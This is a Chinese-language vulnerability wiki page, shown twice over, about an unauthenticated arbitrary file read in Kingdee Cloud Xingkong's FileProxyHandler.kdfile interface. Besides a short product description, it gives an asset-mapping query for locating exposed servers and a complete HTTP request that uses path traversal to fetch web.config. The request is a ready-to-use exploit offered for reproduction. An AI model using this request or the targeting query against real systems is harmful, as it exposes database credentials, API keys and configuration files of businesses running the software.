fofamini-wiki

登录白背景

源码

金蝶云星空管理中心FileProxyHandler.kdfile 任意文件读取漏洞

一、漏洞简介

金蝶云星空是一款云端企业资源管理（ERP）软件，为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织，多利润中心的大中型企业，以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖：财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务，帮助企业实现数字化营销新生态及管理重构等，提升企业数字化能力。金蝶云星空FileProxyHandler.kdfile接口处由于权限设置不当，未经身份认证的攻击者可以利用此漏洞访问服务器上的任意文件，包括数据库凭据、API密钥、配置文件等，从而获取系统权限和敏感信息。

二、影响版本

金蝶云星空-管理中心

三、资产测绘

hunter：app.name="Kingdee 金蝶云星空"

登录页面

四、漏洞复现

GET /FileProxyHandler.kdfile?Area=0&F=..%2F..%2Fweb.config&Ope=SDL&Step=100000 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=rtanmcljbthsauvcfgff504m; Theme=standard; kdservice-sessionid=349316fc-dc0f-4a57-8cf4-20ba7b60e989
Upgrade-Insecure-Requests: 1

原文: https://www.yuque.com/xiaokp7/ocvun2/ilnlkxdf43y07fo3

# 金蝶云星空管理中心FileProxyHandler.kdfile 任意文件读取漏洞

# 一、漏洞简介
金蝶云星空是一款云端企业资源管理（ERP）软件，为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织，多利润中心的大中型企业，以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖：财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务，帮助企业实现数字化营销新生态及管理重构等，提升企业数字化能力。金蝶云星空FileProxyHandler.kdfile接口处由于权限设置不当，未经身份认证的攻击者可以利用此漏洞访问服务器上的任意文件，包括数据库凭据、API密钥、配置文件等，从而获取系统权限和敏感信息。

# 二、影响版本

- 金蝶云星空-管理中心

# 三、资产测绘

- hunter：`app.name="Kingdee 金蝶云星空"`

![image.png](./img/zfuqIVGZYaf26CLG/1692091946855-4d6f0c44-a8af-4533-82d4-71f187259f6b-375185.png)

- 登录页面

![image.png](./img/zfuqIVGZYaf26CLG/1692091965569-37950abd-0027-4b34-a010-29c3fb370833-292812.png)

# 四、漏洞复现
```java
GET /FileProxyHandler.kdfile?Area=0&F=..%2F..%2Fweb.config&Ope=SDL&Step=100000 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=rtanmcljbthsauvcfgff504m; Theme=standard; kdservice-sessionid=349316fc-dc0f-4a57-8cf4-20ba7b60e989
Upgrade-Insecure-Requests: 1
```
![image.png](./img/zfuqIVGZYaf26CLG/1697810491661-6008d63c-ee84-49d0-b53d-a0f60d342369-453505.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ilnlkxdf43y07fo3>